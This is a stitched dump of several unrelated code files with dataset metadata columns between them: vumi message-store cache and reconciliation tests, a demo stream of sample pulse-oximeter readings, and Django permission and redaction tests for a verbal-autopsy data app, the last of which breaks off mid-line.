# FakeRedis provides a flushdb() function but TxRedisManager doesn't
# and I'm not sure what the intended behaviour of flushdb on a
# submanager is
return message_store.cache.redis._purge_all()
@inlineCallbacks
def test_cache_batch_start(self):
batch_id = yield self.store.batch_start([("poolA", "tag1")])
self.assertTrue((yield self.store.cache.batch_exists(batch_id)))
self.assertTrue(batch_id in (yield self.store.cache.get_batch_ids()))
@inlineCallbacks
def test_cache_add_outbound_message(self):
msg_id, msg, batch_id = yield self._create_outbound()
[cached_msg_id] = (
yield self.store.cache.get_outbound_message_keys(batch_id))
cached_to_addrs = yield self.store.cache.get_to_addrs(batch_id)
self.assertEqual(msg_id, cached_msg_id)
# NOTE: This functionality is disabled for now.
# self.assertEqual([msg['to_addr']], cached_to_addrs)
self.assertEqual([], cached_to_addrs)
@inlineCallbacks
def test_cache_add_inbound_message(self):
msg_id, msg, batch_id = yield self._create_inbound()
[cached_msg_id] = (
yield self.store.cache.get_inbound_message_keys(batch_id))
cached_from_addrs = yield self.store.cache.get_from_addrs(batch_id)
self.assertEqual(msg_id, cached_msg_id)
# NOTE: This functionality is disabled for now.
# self.assertEqual([msg['from_addr']], cached_from_addrs)
self.assertEqual([], cached_from_addrs)
@inlineCallbacks
def test_cache_add_event(self):
msg_id, msg, batch_id = yield self._create_outbound()
ack = TransportEvent(user_message_id=msg_id, event_type='ack',
sent_message_id='xyz')
yield self.store.add_event(ack)
self.assertEqual((yield self.store.cache.get_event_status(batch_id)), {
'delivery_report': 0,
'delivery_report.delivered': 0,
'delivery_report.failed': 0,
'delivery_report.pending': 0,
'ack': 1,
'nack': 0,
'sent': 1,
})
@inlineCallbacks
def test_needs_reconciliation(self):
msg_id, msg, batch_id = yield self._create_outbound()
self.assertFalse((yield self.store.needs_reconciliation(batch_id)))
msg_id, msg, batch_id = yield self._create_outbound()
# Store via message_store
yield self.create_outbound_messages(batch_id, 10)
# Store one extra in the cache to throw off the allow threshold delta
recon_msg = self.msg_helper.make_outbound("foo")
yield self.store.cache.add_outbound_message(batch_id, recon_msg)
# Default reconciliation delta should return True
self.assertTrue((yield self.store.needs_reconciliation(batch_id)))
# More liberal reconciliation delta should return False
self.assertFalse((
yield self.store.needs_reconciliation(batch_id, delta=0.1)))
@inlineCallbacks
def test_reconcile_cache(self):
cache = self.store.cache
batch_id = yield self.store.batch_start([("pool", "tag")])
# Store via message_store
yield self.create_inbound_messages(batch_id, 1, from_addr='from1')
yield self.create_inbound_messages(batch_id, 2, from_addr='from2')
yield self.create_inbound_messages(batch_id, 3, from_addr='from3')
outbound_messages = []
outbound_messages.extend((yield self.create_outbound_messages(
batch_id, 4, to_addr='to1')))
outbound_messages.extend((yield self.create_outbound_messages(
batch_id, 6, to_addr='to2')))
for msg in outbound_messages:
ack = self.msg_helper.make_ack(msg)
yield self.store.add_event(ack)
yield self.clear_cache(self.store)
batch_status = yield self.store.batch_status(batch_id)
self.assertEqual(batch_status, {})
# Default reconciliation delta should return True
self.assertTrue((yield self.store.needs_reconciliation(batch_id)))
yield self.store.reconcile_cache(batch_id)
# Reconciliation check should return False after recon.
self.assertFalse((yield self.store.needs_reconciliation(batch_id)))
self.assertFalse(
(yield self.store.needs_reconciliation(batch_id, delta=0)))
inbound_count = yield cache.count_inbound_message_keys(batch_id)
self.assertEqual(inbound_count, 6)
outbound_count = yield cache.count_outbound_message_keys(batch_id)
self.assertEqual(outbound_count, 10)
inbound_uniques = yield cache.count_from_addrs(batch_id)
self.assertEqual(inbound_uniques, 3)
outbound_uniques = yield cache.count_to_addrs(batch_id)
self.assertEqual(outbound_uniques, 2)
batch_status = yield self.store.batch_status(batch_id)
self.assertEqual(batch_status['ack'], 10)
self.assertEqual(batch_status['sent'], 10)
@inlineCallbacks
def test_reconcile_cache_with_old_and_new_messages(self):
"""
If we're reconciling a batch that contains messages older than the
truncation threshold and newer than the start of the recon, we still
end up with the correct numbers.
"""
cache = self.store.cache
cache.TRUNCATE_MESSAGE_KEY_COUNT_AT = 5
batch_id = yield self.store.batch_start([("pool", "tag")])
# Store via message_store
inbound_messages = []
inbound_messages.extend((yield self.create_inbound_messages(
batch_id, 1, from_addr='from1')))
inbound_messages.extend((yield self.create_inbound_messages(
batch_id, 2, from_addr='from2')))
inbound_messages.extend((yield self.create_inbound_messages(
batch_id, 3, from_addr='from3')))
outbound_messages = []
outbound_messages.extend((yield self.create_outbound_messages(
batch_id, 4, to_addr='to1')))
outbound_messages.extend((yield self.create_outbound_messages(
batch_id, 6, to_addr='to2')))
for msg in outbound_messages:
ack = self.msg_helper.make_ack(msg)
yield self.store.add_event(ack)
dr = self.msg_helper.make_delivery_report(
msg, delivery_status="delivered")
yield self.store.add_event(dr)
# We want one message newer than the start of the recon, and they're
# ordered from newest to oldest.
start_timestamp = format_vumi_date(inbound_messages[1]["timestamp"])
yield self.store.reconcile_cache(batch_id, start_timestamp)
inbound_count = yield cache.count_inbound_message_keys(batch_id)
self.assertEqual(inbound_count, 6)
outbound_count = yield cache.count_outbound_message_keys(batch_id)
self.assertEqual(outbound_count, 10)
inbound_uniques = yield self.store.cache.count_from_addrs(batch_id)
self.assertEqual(inbound_uniques, 3)
outbound_uniques = yield self.store.cache.count_to_addrs(batch_id)
self.assertEqual(outbound_uniques, 2)
batch_status = yield self.store.batch_status(batch_id)
self.assertEqual(batch_status["sent"], 10)
self.assertEqual(batch_status["ack"], 10)
self.assertEqual(batch_status["delivery_report"], 10)
self.assertEqual(batch_status["delivery_report.delivered"], 10)
@inlineCallbacks
def test_reconcile_cache_and_switch_to_counters(self):
batch_id = yield self.store.batch_start([("pool", "tag")])
cache = self.store.cache
# Clear the cache and restart the batch without counters.
yield cache.clear_batch(batch_id)
yield cache.batch_start(batch_id, use_counters=False)
# Store via message_store
yield self.create_inbound_messages(batch_id, 1, from_addr='from1')
yield self.create_inbound_messages(batch_id, 2, from_addr='from2')
yield self.create_inbound_messages(batch_id, 3, from_addr='from3')
outbound_messages = []
outbound_messages.extend((yield self.create_outbound_messages(
batch_id, 4, to_addr='to1')))
outbound_messages.extend((yield self.create_outbound_messages(
batch_id, 6, to_addr='to2')))
for msg in outbound_messages:
ack = self.msg_helper.make_ack(msg)
yield self.store.add_event(ack)
# This will fail if we're using counter-based events with a ZSET.
events_scard = yield cache.redis.scard(cache.event_key(batch_id))
# HACK: We're not tracking these in the SET anymore.
# See HACK comment in message_store_cache.py.
# self.assertEqual(events_scard, 10)
self.assertEqual(events_scard, 0)
yield self.clear_cache(self.store)
batch_status = yield self.store.batch_status(batch_id)
self.assertEqual(batch_status, {})
# Default reconciliation delta should return True
self.assertTrue((yield self.store.needs_reconciliation(batch_id)))
yield self.store.reconcile_cache(batch_id)
# Reconciliation check should return False after recon.
self.assertFalse((yield self.store.needs_reconciliation(batch_id)))
self.assertFalse(
(yield self.store.needs_reconciliation(batch_id, delta=0)))
inbound_count = yield cache.count_inbound_message_keys(batch_id)
self.assertEqual(inbound_count, 6)
outbound_count = yield cache.count_outbound_message_keys(batch_id)
self.assertEqual(outbound_count, 10)
inbound_uniques = yield self.store.cache.count_from_addrs(batch_id)
self.assertEqual(inbound_uniques, 3)
outbound_uniques = yield self.store.cache.count_to_addrs(batch_id)
self.assertEqual(outbound_uniques, 2)
batch_status = yield self.store.batch_status(batch_id)
self.assertEqual(batch_status['ack'], 10)
self.assertEqual(batch_status['sent'], 10)
# This will fail if we're using old-style events with a SET.
events_zcard = yield cache.redis.zcard(cache.event_key(batch_id))
self.assertEqual(events_zcard, 10)
@inlineCallbacks
def test_find_inbound_keys_matching(self):
batch_id = yield self.store.batch_start([("pool", "tag")])
# Store via message_store
messages = yield self.create_inbound_messages(batch_id, 10)
token = yield self.store.find_inbound_keys_matching(batch_id, [{
'key': 'msg.content',
'pattern': '.*',
'flags': 'i',
}], wait=True)
keys = yield self.store.get_keys_for_token(batch_id, token)
in_progress = yield self.store.cache.is_query_in_progress(
batch_id, token)
self.assertEqual(len(keys), 10)
self.assertEqual(
10, (yield self.store.count_keys_for_token(batch_id, token)))
self.assertEqual(keys, [msg['message_id'] for msg in messages])
self.assertFalse(in_progress)
@inlineCallbacks
def test_find_outbound_keys_matching(self):
batch_id = yield self.store.batch_start([("pool", "tag")])
# Store via message_store
messages = yield self.create_outbound_messages(batch_id, 10)
token = yield self.store.find_outbound_keys_matching(batch_id, [{
'key': 'msg.content',
'pattern': '.*',
'flags': 'i',
}], wait=True)
keys = yield self.store.get_keys_for_token(batch_id, token)
in_progress = yield self.store.cache.is_query_in_progress(
batch_id, token)
self.assertEqual(len(keys), 10)
self.assertEqual(
10, (yield self.store.count_keys_for_token(batch_id, token)))
self.assertEqual(keys, [msg['message_id'] for msg in messages])
self.assertFalse(in_progress)
@inlineCallbacks
def test_get_inbound_message_keys(self):
batch_id = yield self.store.batch_start([('pool', 'tag')])
messages = yield self.create_inbound_messages(batch_id, 10)
keys = yield self.store.get_inbound_message_keys(batch_id)
self.assertEqual(keys, [msg['message_id'] for msg in messages])
@inlineCallbacks
def test_get_inbound_message_keys_with_timestamp(self):
batch_id = yield self.store.batch_start([('pool', 'tag')])
messages = yield self.create_inbound_messages(batch_id, 10)
results = dict((yield self.store.get_inbound_message_keys(
batch_id, with_timestamp=True)))
for msg in messages:
found = results[msg['message_id']]
expected = time.mktime(msg['timestamp'].timetuple())
self.assertAlmostEqual(found, expected)
@inlineCallbacks
def test_get_outbound_message_keys(self):
batch_id = yield self.store.batch_start([('pool', 'tag')])
messages = yield self.create_outbound_messages(batch_id, 10)
keys = yield self.store.get_outbound_message_keys(batch_id)
self.assertEqual(keys, [msg['message_id'] for msg in messages])
@inlineCallbacks
def test_get_outbound_message_keys_with_timestamp(self):
batch_id = yield self.store.batch_start([('pool', 'tag')])
messages = yield self.create_outbound_messages(batch_id, 10)
results = dict((yield self.store.get_outbound_message_keys(
batch_id, with_timestamp=True)))
for msg in messages:
found = results[msg['message_id']]
expected = time.mktime(msg['timestamp'].timetuple())
self.assertAlmostEqual(found, expected)
class TestMigrationFunctions(TestMessageStoreBase):
@inlineCallbacks
def test_add_batches_to_event_no_batches(self):
"""
If the stored event has no batches, they're looked up from the outbound
message and added to the event.
"""
msg_id, msg, batch_id = yield self._create_outbound()
ack = self.msg_helper.make_ack(msg)
ack_id = ack['event_id']
yield self.store.add_event(ack, batch_ids=[])
event = yield self.store.events.load(ack_id)
self.assertEqual(event.batches.keys(), [])
updated = yield add_batches_to_event(event)
self.assertEqual(updated, True)
self.assertEqual(event.batches.keys(), [batch_id])
@inlineCallbacks
def test_add_batches_to_event_with_batches(self):
"""
If the stored event already has batches, we do nothing.
"""
msg_id, msg, batch_id = yield self._create_outbound()
ack = self.msg_helper.make_ack(msg)
ack_id = ack['event_id']
yield self.store.add_event(ack, batch_ids=[batch_id])
event = yield self.store.events.load(ack_id)
self.assertEqual(event.batches.keys(), [batch_id])
updated = yield add_batches_to_event(event)
self.assertEqual(updated, False)
self.assertEqual(event.batches.keys(), [batch_id])
| 42.498168
| 79
| 0.649913
| 10,476
| 81,214
| 4.734059
| 0.034746
| 0.074041
| 0.082712
| 0.061681
| 0.89777
| 0.883272
| 0.857805
| 0.841372
| 0.827741
| 0.806973
| 0
| 0.015163
| 0.241522
| 81,214
| 1,910
| 80
| 42.520419
| 0.789948
| 0.02305
| 0
| 0.756331
| 0
| 0
| 0.05135
| 0.005297
| 0
| 0
| 0
| 0
| 0.175222
| 0
| null | null | 0
| 0.00616
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
1c0767e1b1f9a81e2dac90983d8c900cbe26e1a7
| 5,525
|
py
|
Python
|
src/main/python/cosmopusher/demo_stream.py
|
konz/cosmopusher
|
7701b3ecd5d2e7fa90e34e75cb53a0dd12c6124c
|
[
"Apache-2.0"
] | null | null | null |
src/main/python/cosmopusher/demo_stream.py
|
konz/cosmopusher
|
7701b3ecd5d2e7fa90e34e75cb53a0dd12c6124c
|
[
"Apache-2.0"
] | null | null | null |
src/main/python/cosmopusher/demo_stream.py
|
konz/cosmopusher
|
7701b3ecd5d2e7fa90e34e75cb53a0dd12c6124c
|
[
"Apache-2.0"
] | null | null | null |
from io import StringIO
from time import sleep
DATA = '''sóme garbäge first
29-Dec-17 07:18:43 99 66 12
29-Dec-17 07:18:45 99 66 17 MO
29-Dec-17 07:18:47 99 66 18 MO
29-Dec-17 07:18:49 99 66 52
29-Dec-17 07:18:51 99 66 61 MO
29-Dec-17 07:18:53 99 66 13 MO
29-Dec-17 07:18:55 99 66 8 MO
29-Dec-17 07:18:57 89* 66 201 MO SL
29-Dec-17 07:18:59 83* 66 200 MO SL
29-Dec-17 07:19:01 79* 66 18 MO SL AS
29-Dec-17 07:19:03 77* 66 30 MO SL AS
29-Dec-17 07:19:05 77* 66 8 MO SL AS
29-Dec-17 07:19:07 77* 70 8 SL AS
29-Dec-17 07:19:09 78* 70 29 MO SL AS
29-Dec-17 07:19:11 78* 70 25 MO SL AS
29-Dec-17 07:19:13 78* 70 4 MO SL AS
29-Dec-17 07:19:15 77* 70 4 MO SL AS
29-Dec-17 07:19:17 75* 71 9 MO SL AS
29-Dec-17 07:19:19 73* 71 9 MO SL AS
N-560 VERSION 1.56.00 CRC:XXXX SpO2 Limit: 90-100% PR Limit: 60-170BPM
ADULT 0SAT-S
TIME %SpO2 BPM PA Status
29-Dec-17 07:19:21 74* 70 11 MO SL AS
29-Dec-17 07:19:23 73* 70 36 MO SL AS
29-Dec-17 07:19:25 73* 70 44 MO SL AS
29-Dec-17 07:19:27 73* 70 12 MO SL AS
29-Dec-17 07:19:29 --- --- --- SD AS
29-Dec-17 07:19:31 --- --- --- SD AS
29-Dec-17 07:19:33 --- --- --- SD AS
29-Dec-17 07:19:35 --- --- --- SD AS
29-Dec-17 07:19:37 --- --- --- SD AS
29-Dec-17 07:19:39 --- --- --- SD AS
29-Dec-17 07:19:41 --- --- --- SD AS
29-Dec-17 07:19:43 --- --- --- SD AS
29-Dec-17 07:19:45 --- --- --- SD AS
29-Dec-17 07:19:47 --- --- --- SD AS
29-Dec-17 07:19:49 --- --- --- SD AS
29-Dec-17 07:19:51 --- --- --- SD AS
29-Dec-17 07:19:53 --- --- --- SD AS
29-Dec-17 07:19:55 --- --- --- SD AS
29-Dec-17 07:19:57 --- --- --- SO AS
29-Dec-17 07:19:59 --- --- --- SO
29-Dec-17 07:20:01 --- --- --- SO
29-Dec-17 07:20:03 --- --- --- SO
N-560 VERSION 1.56.00 CRC:XXXX SpO2 Limit: 90-100% PR Limit: 60-170BPM
ADULT 0SAT-S
TIME %SpO2 BPM PA Status
29-Dec-17 07:20:05 --- --- --- SO
29-Dec-17 07:20:07 --- --- --- SO
29-Dec-17 07:20:09 --- --- --- SO
29-Dec-17 07:20:11 --- --- --- SO
29-Dec-17 07:20:13 --- --- --- SO
29-Dec-17 07:20:15 --- --- --- SO
29-Dec-17 07:20:17 --- --- --- SO
29-Dec-17 07:20:19 --- --- --- SO
29-Dec-17 07:20:21 --- --- --- SO
29-Dec-17 07:20:23 --- --- --- SO
29-Dec-17 07:20:25 --- --- --- SO
29-Dec-17 07:20:27 0 0 --- PS
29-Dec-17 07:20:29 0 0 --- PS
29-Dec-17 07:20:31 0 0 --- PS
29-Dec-17 07:20:33 0 0 --- PS
29-Dec-17 07:20:35 0 0 --- PS
29-Dec-17 07:20:37 0 0 --- PS
29-Dec-17 07:20:39 0 0 --- PS
29-Dec-17 07:20:41 0 0 --- PS
29-Dec-17 07:20:43 94 119 5
29-Dec-17 07:20:45 94 103 4
29-Dec-17 07:20:47 94 92 4
N-560 VERSION 1.56.00 CRC:XXXX SpO2 Limit: 90-100% PR Limit: 60-170BPM
ADULT 0SAT-S
TIME %SpO2 BPM PA Status
29-Dec-17 07:20:49 94 91 4 MO
29-Dec-17 07:20:51 95 88 4 MO
29-Dec-17 07:20:53 95 83 5
29-Dec-17 07:20:55 95 77 4
29-Dec-17 07:20:57 95 72 4
29-Dec-17 07:20:59 96 70 4
29-Dec-17 07:21:01 97 68 5
29-Dec-17 07:21:03 97 65 5
29-Dec-17 07:21:05 97 63 6
29-Dec-17 07:21:07 97 63 5
29-Dec-17 07:21:09 97 63 5 MO
29-Dec-17 07:21:11 96 63 7 MO
29-Dec-17 07:21:13 96 63 --- PS
'''
class DemoStream:
def readlines(self):
while True:
for line in StringIO(DATA).readlines():
sleep(2)
yield line
| 54.70297
| 80
| 0.329231
| 796
| 5,525
| 2.285176
| 0.153266
| 0.208906
| 0.292468
| 0.376031
| 0.728972
| 0.68829
| 0.471138
| 0.332051
| 0.172622
| 0.172622
| 0
| 0.425
| 0.551131
| 5,525
| 100
| 81
| 55.25
| 0.308468
| 0
| 0
| 0.094737
| 0
| 0.031579
| 0.958001
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.010526
| false
| 0
| 0.021053
| 0
| 0.042105
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1c0a74c803eced8810f06e8588895124ebfb2b74
| 15,290
|
py
|
Python
|
va_explorer/va_data_management/tests/test_views.py
|
VA-Explorer/va_explorer
|
e43cfbff0ce5209c12134b7ac4ce439db6fc87a2
|
[
"Apache-2.0"
] | null | null | null |
va_explorer/va_data_management/tests/test_views.py
|
VA-Explorer/va_explorer
|
e43cfbff0ce5209c12134b7ac4ce439db6fc87a2
|
[
"Apache-2.0"
] | 125
|
2020-10-07T12:00:15.000Z
|
2022-03-31T21:29:21.000Z
|
va_explorer/va_data_management/tests/test_views.py
|
VA-Explorer/va_explorer
|
e43cfbff0ce5209c12134b7ac4ce439db6fc87a2
|
[
"Apache-2.0"
] | 2
|
2020-10-29T16:08:42.000Z
|
2020-12-08T19:03:41.000Z
|
import pytest
from django.test import Client
from django.contrib.auth.models import Permission
from va_explorer.users.models import User
from va_explorer.va_data_management.models import VerbalAutopsy
from va_explorer.tests.factories import GroupFactory, VerbalAutopsyFactory, UserFactory, LocationFactory, \
FieldWorkerFactory, FieldWorkerGroupFactory, FacilityFactory, VaUsernameFactory
from va_explorer.va_data_management.models import REDACTED_STRING
pytestmark = pytest.mark.django_db
# Get the index and make sure the VA in the system is listed
def test_index_with_valid_permission(user: User):
can_view_record = Permission.objects.filter(codename="view_verbalautopsy").first()
can_view_pii = Permission.objects.filter(codename="view_pii").first()
can_view_record_group = GroupFactory.create(permissions=[can_view_record, can_view_pii])
user = UserFactory.create(groups=[can_view_record_group])
client = Client()
client.force_login(user=user)
va = VerbalAutopsyFactory.create(Id10017='Victim name', Id10010='Interviewer name')
response = client.get("/va_data_management/")
assert response.status_code == 200
assert bytes(va.Id10010, "utf-8") in response.content
# Get the index and make sure the VA in the system is listed
def test_index_redacted(user: User):
can_view_record = Permission.objects.filter(codename="view_verbalautopsy").first()
can_view_record_group = GroupFactory.create(permissions=[can_view_record])
user = UserFactory.create(groups=[can_view_record_group])
client = Client()
client.force_login(user=user)
va = VerbalAutopsyFactory.create(Id10023='death date')
response = client.get("/va_data_management/")
assert response.status_code == 200
assert bytes(REDACTED_STRING, "utf-8") in response.content
assert bytes(va.Id10023, "utf-8") not in response.content
# Request the index without permissions and make sure its forbidden
def test_index_without_valid_permission(user: User):
client = Client()
client.force_login(user=user)
response = client.get("/va_data_management/")
assert response.status_code == 403
# Show a VA and make sure the data is as expected
def test_show(user: User):
can_view_record = Permission.objects.filter(codename="view_verbalautopsy").first()
can_view_pii = Permission.objects.filter(codename="view_pii").first()
can_view_record_group = GroupFactory.create(permissions=[can_view_record, can_view_pii])
user = UserFactory.create(groups=[can_view_record_group])
client = Client()
client.force_login(user=user)
va = VerbalAutopsyFactory.create(Id10017='Victim name')
response = client.get(f"/va_data_management/show/{va.id}")
assert response.status_code == 200
assert bytes(va.Id10017, "utf-8") in response.content
# Show a VA and make sure the data is as expected (with redacted)
def test_show_redacted(user: User):
can_view_record = Permission.objects.filter(codename="view_verbalautopsy").first()
can_view_record_group = GroupFactory.create(permissions=[can_view_record])
user = UserFactory.create(groups=[can_view_record_group])
client = Client()
client.force_login(user=user)
va = VerbalAutopsyFactory.create(Id10017='Victim name')
response = client.get(f"/va_data_management/show/{va.id}")
assert response.status_code == 200
assert bytes(REDACTED_STRING, "utf-8") in response.content
assert bytes(va.Id10017, "utf-8") not in response.content
# Request the show page for VA without permissions and make sure it's forbidden
def test_show_without_valid_permissions(user: User):
client = Client()
client.force_login(user=user)
va = VerbalAutopsyFactory.create(Id10017='Victim name', Id10010='Interviewer name')
response = client.get(f"/va_data_management/show/{va.id}")
assert response.status_code == 403
# Request the edit form of a VA and make sure the data is as expected
def test_edit_with_valid_permissions(user: User):
can_edit_record = Permission.objects.filter(codename="change_verbalautopsy").first()
can_view_pii = Permission.objects.filter(codename="view_pii").first()
can_edit_record_group = GroupFactory.create(permissions=[can_edit_record, can_view_pii])
user = UserFactory.create(groups=[can_edit_record_group])
client = Client()
client.force_login(user=user)
va = VerbalAutopsyFactory.create(Id10017='Victim name', Id10010='Interviewer name')
response = client.get(f"/va_data_management/edit/{va.id}")
assert response.status_code == 200
assert bytes(va.Id10010, "utf-8") in response.content
assert bytes(va.Id10017, "utf-8") in response.content
# Request the edit form of a VA without permissions and make sure its forbidden
def test_edit_without_valid_permissions(user: User):
client = Client()
client.force_login(user=user)
va = VerbalAutopsyFactory.create(Id10017='Victim name', Id10010='Interviewer name')
response = client.get(f"/va_data_management/edit/{va.id}")
assert response.status_code == 403
# Update a VA and make sure 1) the data is changed and 2) the history is tracked
def test_save_with_valid_permissions(user: User):
can_edit_record = Permission.objects.filter(codename="change_verbalautopsy").first()
can_view_record = Permission.objects.filter(codename="view_verbalautopsy").first()
can_view_pii = Permission.objects.filter(codename="view_pii").first()
can_edit_view_record_group = GroupFactory.create(permissions=[can_edit_record, can_view_record, can_view_pii])
user = UserFactory.create(groups=[can_edit_view_record_group])
client = Client()
client.force_login(user=user)
va = VerbalAutopsyFactory.create(Id10017='Victim name', Id10010='Interviewer name')
assert va.history.count() == 1
new_name = "Updated Example Name"
response = client.post(f"/va_data_management/edit/{va.id}", { "Id10010": new_name, "Id10023":"2021-03-01", "Id10058": va.location.name })
assert response.status_code == 302
assert response["Location"] == f"/va_data_management/show/{va.id}"
va = VerbalAutopsy.objects.get(id=va.id)
assert va.Id10010 == new_name
assert va.Id10023 == "2021-03-01"
assert va.history.count() == 2
assert va.history.first().history_user == user
response = client.get(f"/va_data_management/show/{va.id}")
# TODO: We need to handle timezones correctly
assert bytes(va.history.first().history_date.strftime('%Y-%m-%d %H:%M'), "utf-8") in response.content
assert bytes(va.history.first().history_user.name, "utf-8") in response.content
# Update a VA and make sure there is no redirect, TODO check form.errors or create separate form test to make this more accurate
def test_save_with_invalid_date_format(user: User):
can_edit_record = Permission.objects.filter(codename="change_verbalautopsy").first()
can_view_record = Permission.objects.filter(codename="view_verbalautopsy").first()
can_view_pii = Permission.objects.filter(codename="view_pii").first()
can_edit_view_record_group = GroupFactory.create(permissions=[can_edit_record, can_view_record, can_view_pii])
user = UserFactory.create(groups=[can_edit_view_record_group])
client = Client()
client.force_login(user=user)
va = VerbalAutopsyFactory.create(Id10017='Victim name', Id10010='Interviewer name')
assert va.history.count() == 1
new_name = "Updated Example Name"
response = client.post(f"/va_data_management/edit/{va.id}", { "Id10010": new_name, "Id10023":"this is not a date 1234" })
assert response.status_code == 200
# Verify save access is restricted
def test_save_without_valid_permissions(user: User):
client = Client()
client.force_login(user=user)
va = VerbalAutopsyFactory.create(Id10017='Victim name', Id10010='Interviewer name')
assert va.history.count() == 1
new_name = "Updated Example Name"
location = va.location
response = client.post(f"/va_data_management/edit/{va.id}", { "Id10010": new_name })
assert response.status_code == 403
# Reset an updated VA and make sure 1) the data is reset to original values and 2) the history is tracked
def test_reset_with_valid_permissions(user: User):
can_edit_record = Permission.objects.filter(codename="change_verbalautopsy").first()
can_view_pii = Permission.objects.filter(codename="view_pii").first()
can_edit_record_group = GroupFactory.create(permissions=[can_edit_record, can_view_pii])
user = UserFactory.create(groups=[can_edit_record_group])
client = Client()
client.force_login(user=user)
va = VerbalAutopsyFactory.create(Id10017='Victim name', Id10010='Interviewer name')
original_name = va.Id10010
original_dod = va.Id10023
new_name = "Updated Name"
client.post(f"/va_data_management/edit/{va.id}", { "Id10010": new_name, "Id10023":"2021-03-01", "Id10058": va.location.name })
va = VerbalAutopsy.objects.get(id=va.id)
assert va.Id10010 == new_name
assert va.history.count() == 2
# TODO: Switch the buttons to forms in show.html and make this a POST.
response = client.get(f"/va_data_management/reset/{va.id}")
assert response.status_code == 302
assert response["Location"] == f"/va_data_management/show/{va.id}"
va = VerbalAutopsy.objects.get(id=va.id)
assert va.Id10010 == original_name
assert va.Id10023 == original_dod
assert va.history.count() == 3
assert va.history.first().history_user == user
# Verify reset access is restricted
def test_reset_without_valid_permissions(user: User):
client = Client()
client.force_login(user=user)
va = VerbalAutopsyFactory.create(Id10017='Victim name', Id10010='Interviewer name')
response = client.get(f"/va_data_management/reset/{va.id}")
assert response.status_code == 403
# Revert an updated VA and make sure 1) the data is reset to previous version and 2) the history is tracked
def test_revert_latest_with_valid_permissions(user: User):
can_edit_record = Permission.objects.filter(codename="change_verbalautopsy").first()
can_view_pii = Permission.objects.filter(codename="view_pii").first()
can_edit_record_group = GroupFactory.create(permissions=[can_edit_record, can_view_pii])
user = UserFactory.create(groups=[can_edit_record_group])
client = Client()
client.force_login(user=user)
va = VerbalAutopsyFactory.create(Id10017='Victim name', Id10010='Interviewer name')
original_name = va.Id10010
second_name = "Second Name"
third_name = "Third Name"
client.post(f"/va_data_management/edit/{va.id}", { "Id10010": second_name, "Id10023":"2021-03-01", "Id10058": va.location.name })
va = VerbalAutopsy.objects.get(id=va.id)
assert va.Id10010 == second_name
assert va.Id10023 == "2021-03-01"
assert va.history.count() == 2
client.post(f"/va_data_management/edit/{va.id}", { "Id10010": third_name, "Id10023":"2021-03-02", "Id10058": va.location.name })
va = VerbalAutopsy.objects.get(id=va.id)
assert va.Id10010 == third_name
assert va.Id10023 == "2021-03-02"
assert va.history.count() == 3
# TODO: Switch the buttons to forms in show.html and make this a POST.
response = client.get(f"/va_data_management/revert_latest/{va.id}")
assert response.status_code == 302
assert response["Location"] == f"/va_data_management/show/{va.id}"
va = VerbalAutopsy.objects.get(id=va.id)
assert va.Id10010 == second_name
assert va.Id10023 == "2021-03-01"
assert va.history.count() == 4
assert va.history.first().history_user == user
# Verify revert access is restricted
def test_revert_latest_without_valid_permissions(user: User):
client = Client()
client.force_login(user=user)
va = VerbalAutopsyFactory.create(Id10017='Victim name', Id10010='Interviewer name')
response = client.get(f"/va_data_management/revert_latest/{va.id}")
assert response.status_code == 403
# Test all methods for access control restrictions
def test_access_control(user: User):
# Set up a location tree so the user can be scoped without access to a VA
can_edit_record = Permission.objects.filter(codename="change_verbalautopsy").first()
can_edit_record_group = GroupFactory.create(permissions=[can_edit_record])
can_view_record = Permission.objects.filter(codename="view_verbalautopsy").first()
can_view_record_group = GroupFactory.create(permissions=[can_view_record])
user = UserFactory.create(groups=[can_edit_record_group, can_view_record_group])
province = LocationFactory.create()
district1 = province.add_child(name='District1', location_type='district')
district2 = province.add_child(name='District2', location_type='district')
facility = district1.add_child(name='Facility', location_type='facility')
va = VerbalAutopsyFactory.create(location=facility, Id10023='death date')
user.location_restrictions.set([district2]) # Should not have access to VA
client = Client()
client.force_login(user=user)
response = client.get("/va_data_management/")
assert response.status_code == 200
assert bytes(va.Id10023, "utf-8") not in response.content
response = client.get(f"/va_data_management/show/{va.id}")
assert response.status_code == 404
response = client.get(f"/va_data_management/edit/{va.id}")
assert response.status_code == 404
response = client.post(f"/va_data_management/edit/{va.id}", { "10023": "new death date" })
assert response.status_code == 404
response = client.get(f"/va_data_management/reset/{va.id}")
assert response.status_code == 404
response = client.get(f"/va_data_management/revert_latest/{va.id}")
assert response.status_code == 404
# A Field Worker can access only the Verbal Autopsies they create through the username on the Verbal Autopsy
def test_field_worker_access_control():
can_view_record = Permission.objects.filter(codename="view_verbalautopsy").first()
can_view_pii = Permission.objects.filter(codename="view_pii").first()
field_worker_group = FieldWorkerGroupFactory.create(permissions=[can_view_record, can_view_pii])
field_worker = FieldWorkerFactory.create(groups=[field_worker_group])
field_worker_username = VaUsernameFactory.create(user=field_worker)
facility = FacilityFactory.create()
field_worker.location_restrictions.add(*[facility])
field_worker.save()
field_worker_username.save()
va = VerbalAutopsyFactory.create(Id10017='deceased_name_1', Id10010='Role specific value', location=facility, username=field_worker_username.va_username)
va2 = VerbalAutopsyFactory.create(Id10017='deceased_name_2', location=facility, username='')
client = Client()
client.force_login(user=field_worker)
response = client.get("/va_data_management/")
assert response.status_code == 200
assert str(va.Id10017).encode('utf_8') in response.content
assert str(va.Id10010).encode('utf_8') not in response.content # field workers see deceased, not interviewer
assert str(va2.Id10017).encode('utf_8') not in response.content
response = client.get(f"/va_data_management/show/{va.id}")
assert response.status_code == 200
response = client.get(f"/va_data_management/show/{va2.id}")
assert response.status_code == 404
| 48.694268
| 157
| 0.745716
| 2,101
| 15,290
| 5.227987
| 0.095669
| 0.026766
| 0.04807
| 0.04024
| 0.817462
| 0.789967
| 0.769756
| 0.758012
| 0.717407
| 0.703569
| 0
| 0.039857
